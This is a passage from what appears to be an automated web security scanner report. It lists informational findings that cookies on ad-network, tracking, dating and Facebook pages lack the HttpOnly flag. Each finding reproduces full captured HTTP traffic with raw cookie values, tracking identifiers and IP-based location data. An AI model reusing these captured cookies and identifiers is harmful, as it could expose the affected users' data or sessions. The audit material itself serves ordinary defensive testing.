Cookie: NETID01=4bf7bb16cf9412c18b8815136d91a59c; rsiPus_Mq_O="MLtPrM93sF9/IDFKT1Ygcyo+R7jFHbJwml9GW5geBHPr+wUITnpse6B5lWFJNAXVCUA2z+7FWZhAQVd6dFXIMjlKZdfb+YKvHMG9lK6M/tj+sUrbdzOSXNiidYeVFSXJGWrqvB4arfK8FH2r+PQoSgVZUPXYsJ2/PWutIm37r0LU6nMnOm2SQDpMvF3l"; rsi_us_1000000="pUP1Jk+j/xMUlj0GV1on/PIeTeZhl/ABIuE0WATIveE06i3f0/xPmLL3uOLZaEB2f2gDfDhI1d91v5puz+N+6b+yvAo7GmaZkTq4Gm/Rw7Ljd/ZFVxiCmfHFFWQyHdzyHv/gxecfTf0/SyR1+0VhDtz2BGcpw7DrM9CfG7dEUG+QQy48Tjo3f24UO/go/049JUZhb76OoyXf/6SsReISLRGVWABNu40UtI3M+cn6gvH8m7abUkKgNwpchhscue2RqqNDoORNIyedxSKdO2NOlKUAinGJIoTupBNQ+Mx5DmeNaeEo0C/I4Kv4rHf7JrR6RNw/NPeBTYR2xzi9Zvc3zfc6z0pTOxpRBzYH4LVtkyF693p6F/duCOSgZkFoF/znm+3H1Y20oOPl3hujZdVgHeaHqj58hOdBb05PleRPZZ36jDJIVm36L6xNl1FI8WeVpkg/gaI9e6dNRG23dHY8U9IY5mfsM8xmgluUCGMJJGcMdbbvccHZIfQ7W1mES+WSeFi1NtIJhqhmsTUdSkpZWOQmgOr7GWaFoTimBcYT5OO3XglWxJ1SFjhurKeAG4O/TiN3yIsta/QyhrTL8HSpL0VaSCXDxRpybSjGaR1Kz7ZbEVRh8qCZtEprm9HQ4/pHm1U35k48q7YXQzhc4Jz4pOrCG7otKe7T9nVU5WPO3R4fXKMJaywU"; NETSEGS_A09801=0a29f867077d7a4f&A09801&0&4e6e5333&0&&4e489fec&eb0686832faccc361b6bf55e98e31ad5; NETSEGS_H07710=0a29f867077d7a4f&H07710&0&4e6e5361&0&&4e488f9e&eb0686832faccc361b6bf55e98e31ad5; NETSEGS_K05540=0a29f867077d7a4f&K05540&0&4e6e5383&0&&4e488ee9&eb0686832faccc361b6bf55e98e31ad5; rtc_w54y=MLsvsVUucS5nJQFEi0OFSQGsjmcetiRaMit+bPGA4R6sZTDkRNAty6Ok5Rbj1A1ioyFEyOvtSDQ/TCNhLSQnMfFltc+1RgLHG60dAReBwur1y8NK9KN/Dcuri2m9TX0WX88UsNrZZUFvhX4gjJPA/IvQAfEyV42LBl1ycziW9oQCPM4wqBsyekr/QAwGJROYDG+0Ga8kxeAZhwipX7/SncE360pVtpvbYb286UDOyKadu9yX5vU5Qs3ZjPvH+kL8j3SfOR53vGwJNDve0naNljcfd9Bk2VzdOh+hbxPQOvocOVQO1E5oD6q+Ae+ZBJDf0rUe4vJF/hy/3qulgTgqvUqi4ANcoG/n4Wm30r3OcEpBzrZH98YC/BAiRwMdtNrapTzKSrNM3VjnPMf/vX2R/pvLCrsbixfPFoZzugmUnA==; rsi_segs_1000000=pUPNJ0OBbwIMV594t637ir85ZKw1UP1rwrKnF0RvvMpZKm8INDTToS2ouxUK6vhhP1CiHsUkC/S+LA0hUkfrTqDh02Adt9O/bxh+p4BRGIFoV5KPobve5AmF69qHl/p4Y6qkzvL/4/cH3yDSxc+IZrQuBcqFKNblvXNAngJPodmU1PMQNiadyR/shRZmjapdy9mKaOfP9eLQncoMS1JJRzzo2e/fuxejfinXLu4/xBJ1owyDCGngQ7C1ONlfjtvlWP+2zKPcenlg0O40YbxNuwTHm3FVQw==; 
udm_0=MLv39VEJbipn5t7J7tE47oWpHVhV4iFqyoWhb2YXc6RRizmzpbqRcFBJpZa8l0/uGxQLxorDLBD8TuVA5WUNID4jhibwZ4E3KEU7bmjAF+DMTX99Z8e5TAcE/5iospv1jq9WzdzH5G3PkTAHlmVVPjMTmkYoiypja8RHeBfW2LL9lawOWNi8GwZWyw2dptMkZkc87MWtUzoO+rbDn+knVc2nLJWzG1vDLEyevLiplpqbjrKec46MMWKWbmMzN6p9Rw0yaI/TkoS+QszoihnKYnTOv4liHmcyUNB3uDcCjJB89p4BkAaVcvlMvwsKDN2hy/x6WccZasvQrozCULup8a8RXgtxrWqM/VBtvHre1tNbfO3uTCLNnN+OpRrzm57EzcIQtJXTltma6dUA+8ydgf8unZm1D8/nsjrnkKFE/a/QeFcsbB/QzplghtgVlbWO9Veu6ri/Bl1yDicT1Kx85i9E8fFUNK1ps6ulCkx9MzRALJPTCYsaXNd+smUyAgPXJoxUtWuoMfjw/WyJB87mUUKGn5DfwJSI/GPXnJ9pX8UJdPSlij4d47Z1GkF4/TLjx0B09V9bIFsdq1cISdi1EeAUfKzuTAARPEHqqFm0tAwzQYOwol+JFGsyGw8mWij3NSBIoWsTuyOw90Q/RODiirBkJZC5+xVSm/1OF4AEL77IF2UQam7poywBCRgs1KI/BO4b86ksCDD+9xxr4vHsm36fCJ0Zm7hnJHavzcI3BlVT5mFi8Pyrs/sAV7+YncekvRHOkcYlTf/bxdaqbNUSRNIvL+wESWlSU6Aivg+oq+GzA7lWv2MOfB60fwu3JaGiGVlNEW/hUozI25/78jDSNd6GhJcXulA9rfV2Bm2jvmVm2v8JIfW1jtNqJ70byKHRd5Dp+EHW1b7BMtwMK8g38PlNfoKZ6rOwz4jKQuNu7dBIs4xwZq/rTrJZq1QFru72+1vyngso51QCD7ofa22bBk6bIzGnZHqw7LKckKR0Px2GDzHiqKZKGOrsMXwRIoT1IuLLN8mska8o+hzro3rcfjPZQPShQdRUyys5bIh66cb9OtaO6QfQLMHigl9kIwrCGA==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_w54y=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_wwje=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_GS70=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_KRSP=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_sPwj=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJkOBbwIMV594t6370FESecNWU/1rwrKnF0RvvMpZKic5ngyRcQgYrs0bIzTjXSAIcE4zTaFgPgtwc8lVQPi/gyxKsYP+vNRmenbJ6esMOTfuQPPWuRacBYCoCRTRO57PdHBMVyIWESlQnpxz0YF0eyDxIX93DUG/JW4VG2H/Fq9uz5dAOPMtPl+iqnAOUmltwt9hgm8W4eB0jIA/gkmJyi9baCyBm6zX3y0gha7M+pXBFYNHNJETkkeNoZnWqwtK9k/mSji+wt97fjci1sUfRNO7I+EXKSY4EuEXliBFR5Bi1eTlWXMKjqRtmw==; Domain=.revsci.net; Expires=Tue, 14-Aug-2012 18:49:25 GMT; Path=/
Set-Cookie: rtc_3b9U=MLs3sVMu8D5nJxHcWw+0zMKkj2Ec8AtgOr6luGR0s/YGr/xIEyuuo6PyP6rJ0huw9fXd6eF11jsqafZ5D+xsAtuozm3Y+FP7gO7bzYbJ3BQaYAbxIXeqtI6gDqEbJDEUZ+OaHlsnUySUjfOYD5RN2whRNsKtuTXJSoXImp9Bjn0ejWdnK8a6//EQI/8+dPnXpiVbJ/jGiMc8aaXYHrTot0RryuQ3ppNos7U2ucvQ2S09+GQFPnIzJ/nDdOnUEBp6IR5hscrpvn6gbQJdnHaOZVmXUNHaMqju0cicQuy33ukQ+idHdRM2s+iGUUSCL7fb4c98Ybo5nH4y1IcRphkaUYgwOxVaAYZMBcKLEfAUJEEIIwJynHkS3xqpLNBouYZqgiAjOeG8tfsDuS5VbvJMlvSyZgnoPaG3RVr3E0bSMZbjG79N2WoTaddr; Domain=.revsci.net; Expires=Tue, 14-Aug-2012 18:49:25 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:49:24 GMT
Content-Length: 1790

/* AG-develop 12.7.1-99 (2011-08-08 18:20:02 UTC) */
rsinetsegs=['H07710_10055','H07710_10041','H07710_10194','H07710_10052','H07710_10138','H07710_10515','H07710_10541','H07710_10313','H07710_10343',
...[SNIP]...

8.49. http://pixel.rubiconproject.com/tap.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=2358 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/display.html?cl=ca-aj-cat&ch=&ty=image%2Cflash&size=300x250&kw=&hints=&target=/5480.iac.usa.ask.hp.x.x.dir/;sz=300x250;log=0;s=as;hhi=159;test=0;ord=1313432642380?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2146=epx833ob7ioshhooj9oxwp9jj6h1a7p1; put_1430=7a4bd699-aa86-4e32-8a1e-afa2b5ba13a0; put_1185=3041410246858069995; cd=false; au=GR8BFBR6-BJ4A-10.195.158.129; lm="11 Aug 2011 22:44:28 GMT"; put_1994=1sbvs30c072oq; put_2054=be7b476b-57fa-4267-a79e-a26d510d1377; rpb=7249%3D1%264554%3D1%264212%3D1%262373%3D1%264940%3D1%265327%3D1%265421%3D1%267203%3D1; rpx=7249%3D13566%2C0%2C1%2C%2C%264554%3D13884%2C0%2C1%2C%2C%264940%3D14009%2C120%2C2%2C%2C%264212%3D14028%2C0%2C1%2C%2C%262373%3D14129%2C0%2C1%2C%2C%265327%3D14148%2C0%2C1%2C%2C%265421%3D14172%2C0%2C1%2C%2C%267203%3D14173%2C0%2C1%2C%2C

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:24:14 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7249%3D1%264554%3D1%264212%3D1%262373%3D1%264940%3D1%265327%3D1%265421%3D1%267203%3D1%262358%3D1; expires=Wed, 14-Sep-2011 18:24:14 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7249%3D13566%2C0%2C1%2C%2C%264554%3D13884%2C0%2C1%2C%2C%264940%3D14009%2C120%2C2%2C%2C%264212%3D14028%2C0%2C1%2C%2C%262373%3D14129%2C0%2C1%2C%2C%265327%3D14148%2C0%2C1%2C%2C%265421%3D14172%2C0%2C1%2C%2C%267203%3D14173%2C0%2C1%2C%2C%262358%3D14194%2C0%2C2%2C%2C; expires=Wed, 14-Sep-2011 18:24:14 GMT; path=/; domain=.pixel.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

8.50. http://pop6.com/p/memsearch.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pop6.com
Path:   /p/memsearch.cgi

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /p/memsearch.cgi HTTP/1.1
Host: pop6.com
Proxy-Connection: keep-alive
Referer: http://pop6.com/
Content-Length: 281
Cache-Control: max-age=0
Origin: http://pop6.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ff_who=r,5w65lMjrqLrwOMX4tBJDb3u9zVyXXDfb8iqcLCgxMtTLydmHHDS2BQhVEFNyJfQm4GGOFc5Xe_Ay7fmuhWNXhiJ_qPyy_w/CzZc1DYiFS5o5eIrIEI51W9T/zDmtNu/o; v_hash=_english_0; IP_COUNTRY=United States; ff_tr=r,E7RSUL0YFx2gJ7Q5eed7yd8wG821Dq4Jd7gqlIWv6YPoJFKcFXi8XGVOPB7IKuq0; LOCATION_FROM_IP=ip_type&Mapped&connection&tx&country_code&US&lat&37.33053&asn&36351&state&California&ip_routing_type&fixed&carrier&softlayer+technologies+inc.&city&San+Jose&postal_code&95122&country_code_cf&99&state_cf&95&latitude&37.33053&second_level_domain&softlayer&country&United+States&longitude&-121.83823&country_name&United+States&area_code&408&timezone&-8.0&line_speed&high&aol&0&top_level_domain&com&region&southwest&city_cf&80&pmsa&7400&zip&95122&msa&41940&continent&north+america&lon&-121.83823&dma_code&807; HISTORY=20110815-1-Dc; REFERRAL_URL=; click_id_time=1867065876_2011-08-15 11:57:42; ki_u=e0c8bfdc-f008-5f82-d3b9-1cc1d298f090; ki_t=1313434723803%3B1313434723803%3B1313434723803%3B1%3B1

who=r%2C5w65lMjrqLrwOMX4tBJDb3u9zVyXXDfb8iqcLCgxMtTLydmHHDS2BQhVEFNyJfQm4GGOFc5Xe_Ay7fmuhWNXhiJ_qPyy_w%2FCzZc1DYiFS5o5eIrIEI51W9T%2FzDmtNu%2Fo&site=ff&searchtype=photo_search&looking_for_person=1&find
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 19:05:35 GMT
Server: Apache/2.2.3 (CentOS) mod_apreq2-20051231/2.6.1 mod_perl/2.0.4 Perl/v5.8.8
Set-Cookie: ff_who=r,9tCSyhGmD_RyWOBWStVf6Xu9zVyXXDfb8iqcLCgxMtTLydmHHDS2BQhVEFNyJfQm4GGOFc5Xe_Ay7fmuhWNXhiJ_qPyy_w/CzZc1DYiFS5o5eIrIEI51W9T/zDmtNu/o; path=/; domain=.pop6.com
Set-Cookie: v_hash=_english_0; path=/; domain=.pop6.com; expires=Wed, 14-Sep-2011 19:05:35 GMT
Set-Cookie: IP_COUNTRY=United States; path=/; domain=.pop6.com; expires=Wed, 14-Sep-2011 19:05:35 GMT
Set-Cookie: ff_tr=r,E7RSUL0YFx2gJ7Q5eed7yd8wG821Dq4Jd7gqlIWv6YPoJFKcFXi8XGVOPB7IKuq0; path=/; domain=.pop6.com; expires=Wed, 14-Sep-2011 19:05:35 GMT
Set-Cookie: LOCATION_FROM_IP=connection&tx&ip_type&Mapped&lat&37.33053&country_code&US&asn&36351&state&California&carrier&softlayer+technologies+inc.&ip_routing_type&fixed&city&San+Jose&state_cf&95&country_code_cf&99&postal_code&95122&latitude&37.33053&second_level_domain&softlayer&country&United+States&area_code&408&country_name&United+States&longitude&-121.83823&line_speed&high&timezone&-8.0&aol&0&region&southwest&top_level_domain&com&city_cf&80&pmsa&7400&msa&41940&zip&95122&continent&north+america&lon&-121.83823&dma_code&807; path=/; domain=.pop6.com; expires=Wed, 14-Sep-2011 19:05:35 GMT
Set-Cookie: HISTORY=20110815-3-Dcs1; path=/; domain=.pop6.com; expires=Wed, 14-Sep-2011 19:05:35 GMT
ETag: TESTBED
P3P: CP="DSP LAW"
X-ApacheServer: ii70-15.friendfinderinc.com
Vary: Accept-Encoding
Content-Length: 75888
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="canonical" href
...[SNIP]...

8.51. http://pt-br.facebook.com/people/Andr%C3%A9-Azevedo/1668500662

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pt-br.facebook.com
Path:   /people/Andr%C3%A9-Azevedo/1668500662

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /people/Andr%C3%A9-Azevedo/1668500662 HTTP/1.1
Host: pt-br.facebook.com
Proxy-Connection: keep-alive
Referer: http://pt-br.facebook.com/people/Andr%C3%A9-Azevedo/1668500662
Content-Length: 998
Cache-Control: max-age=0
Origin: http://pt-br.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; lsd=yxUAz; datr=pG8pTrLcOF5vWXJLyEMRGq7p; reg_ext_ref=http%3A%2F%2Fia.media-imdb.com%2Fimages%2FM%2FMV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg%40%40._V1_.swf; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.206519616063696.51681.146642365384755; act=1313433616787%2F1

post_form_id=208956c150919ab1cdeb13e59d929c7b&lsd=yxUAz&captcha_persist_data=AZn2Prk2YE02IBt6SralDuwZdXf9ZmW3h45Cn_PY4olwLPKhUXsCTDVn8L9HD-Vh3HuEMIvMMVmehaCRNynGK33nkkHNi9pP41mupKoNjo04_5AY6G12AqHHbwP
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: next=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: rdir=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fpt-br.facebook.com%2Fpeople%2FAndr%25C3%25A9-Azevedo%2F1668500662; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: x-src=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.166.91
X-Cnection: close
Date: Mon, 15 Aug 2011 18:39:57 GMT
Content-Length: 72641

<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt" xmlns:og="http://ogp.me/ns#" lang="pt" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;wi
...[SNIP]...

8.52. http://r1-ads.ace.advertising.com/site=789981/size=728090/u=2/bnum=73612408/hr=13/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.imdb.com%252Fimages%252FSF99c7f777fc74f1d954417f99b985a4af%252Fa%252Fifb%252Fdoubleclick%252Fexpand.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=789981/size=728090/u=2/bnum=73612408/hr=13/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.imdb.com%252Fimages%252FSF99c7f777fc74f1d954417f99b985a4af%252Fa%252Fifb%252Fdoubleclick%252Fexpand.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=789981/size=728090/u=2/bnum=73612408/hr=13/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.imdb.com%252Fimages%252FSF99c7f777fc74f1d954417f99b985a4af%252Fa%252Fifb%252Fdoubleclick%252Fexpand.html HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://bpx.a9.com/amzn/iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=pH430013111733250028; aceRTB=rm%3DFri%2C%2019%20Aug%202011%2014%3A48%3A39%20GMT%7Cam%3DFri%2C%2019%20Aug%202011%2014%3A48%3A39%20GMT%7Cdc%3DFri%2C%2019%20Aug%202011%2014%3A48%3A39%20GMT%7Can%3DFri%2C%2019%20Aug%202011%2014%3A48%3A39%20GMT%7Crub%3DFri%2C%2019%20Aug%202011%2014%3A48%3A39%20GMT%7C; A07L=3DM2reol9thECsRTmmuji_6yZBuTfBAd8OCZMhF9rk8jCf_-UPHfh8A; GUID=MTMxMzE5ODMwNTsxOjE3NGJrNzAwYWI2NjZtOjM2NQ; C2=BeTSOlLuFYRxG4Jq5EwFbZwaq+WAsVmRSjKOAMxWGRGtbLQtuaMGKMtrGDNZjMrxQLoIH0bSFl2moVmfzZUozS+B8pqRpVmfqaUoSK8BItdh4eQ3WXIuwaHCW8oxIBK9IU1IGCF; F1=BE4NJ5kAAAAA9iCDAEAAgEABAAAABAAAAEAAgEA; BASE=6cQnzlHYhoShvR1ceK3XL5aycYSYS86phwGH+KypTDXy5bPKnWShBX+I1kY4koT2wF0GVGuvu9AwwtMNvfiwMKCK3FXHo6CDdE4k8Ac0L0vPHOjgv1X3VKLkc5jIoT3KrQ0dlev7c4Q7TtKXkwoTyzZpoD5kIIWMw6pKXumJxaAylsrGPflwlzGZJOqJpfNI/gxASKU+TQ1nZ+L78EymLnA!; ROLL=jTgYEkXLjqa4aJBDIcb3d6zVdS4qvatzUjH3Pi0QjhhuPM9d8fW31EAB/MYISDOnqNIptoFV6jtmADHvDwkEA/5Fw5NB03P!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.973593.789981.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 15 Aug 2011 18:41:26 GMT
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:41:27 GMT
Content-Length: 1047
Connection: close
Set-Cookie: C2=XhWSOlLuFYRxGPJq5EwFbZwaq+WAsVmBIjKOAMxWGoFtbLQtuaoDKMtrGaMZjMrhGLoIH0bSF81moVmfzZwlzS+B8pqBfVmfqawlSK8BItdRueQ3WXkrwaHCW8oh+AK9IU1IGZE; domain=advertising.com; expires=Wed, 14-Aug-2013 18:41:26 GMT; path=/
Set-Cookie: F1=BcFaJ5kAAAAAd3ADAEAAgEgAAAAA9iCDAEAAODABAAAABAAAAIAAODA; domain=advertising.com; expires=Wed, 14-Aug-2013 18:41:26 GMT; path=/
Set-Cookie: BASE=6cQnylHYhoShvR1ceK3XL5aycYSYS86phwGH+KypTDXy5bPKnWShBX+I1kY4koT2wF0GVGuvu9AwwtMNvfiwMKCK3FXHo6CDdE4k8Ac0L0vPHOjgv1X3VKLkc5jIoT3KrQ0dlev7c4Q7TtKXkwoTyzZpoD5kIIWMw6pKXumJxaAylsrGPflwlzGZJOqJpfNI/gxASKU+TQ1nZ+L78EymLnAW4DkJw8N!; domain=advertising.com; expires=Wed, 14-Aug-2013 18:41:26 GMT; path=/
Set-Cookie: ROLL=jTgYEkXLjqa4aJBDIcb3d6zVdS4qvatvUjH3ic0QjhhuPM9d8fW31EAB/MYISDOnqNIptoFV6jtmADHvDwkEA/5Fw5NB03P!; domain=advertising.com; expires=Wed, 14-Aug-2013 18:41:26 GMT; path=/
Set-Cookie: 73612408=_4e496857,3023863148,789981^973593^65^0,0_; domain=advertising.com; path=/click

document.write('<iframe src="http://view.atdmt.com/CNT/iview/286710723/direct;wi.728;hi.90/01/3023863148?click=http://r1-ads.ace.advertising.com/click/site=0000789981/mnum=0000973593/cstr=73612408=_4e
...[SNIP]...

8.53. http://sales.liveperson.net/hc/76226072/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/76226072/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/76226072/?visitor=&msessionkey=&site=76226072&cmd=knockPage&page=http%3A//www.wireless.att.com/cell-phone-service/packages/free-packages.jsp%3Fsource%3DECWD000000000000O&visitorStatus=INSITE_STATUS&activePlugin=none&pageWindowName=1313432467768&javaSupport=true&id=5971605190&scriptVersion=1.1&d=1313432469797&title=Free%20Phone%20Deals%20and%20Packages%20-%20Shop%20-%20Wireless%20from%20AT%26T&referrer=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue HTTP/1.1
Host: sales.liveperson.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wireless.att.com/cell-phone-service/packages/free-packages.jsp?source=ECWD000000000000O
Cookie: LivePersonID=-546022977410-1313431914:-1:-1:-1:-1; HumanClickKEY=7991325949139639887; LivePersonID=LP i=546022977410,d=1312768968; HumanClickACTIVE=1313431908597

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:22:55 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickACTIVE=1313432576322; expires=Tue, 16-Aug-2011 18:22:56 GMT; path=/
Content-Type: image/gif
Last-Modified: Mon, 15 Aug 2011 18:22:56 GMT
Cache-Control: private
Set-Cookie: HumanClickSiteContainerID_76226072=Master; path=/hc/76226072
Set-Cookie: LivePersonID=-546022977410-1313431914:-1:-1:-1:-1; expires=Tue, 14-Aug-2012 18:22:56 GMT; path=/hc/76226072; domain=.liveperson.net
Content-Length: 34

GIF89aZ............,...........L.;

8.54. http://sales.liveperson.net/hc/76226072/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/76226072/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request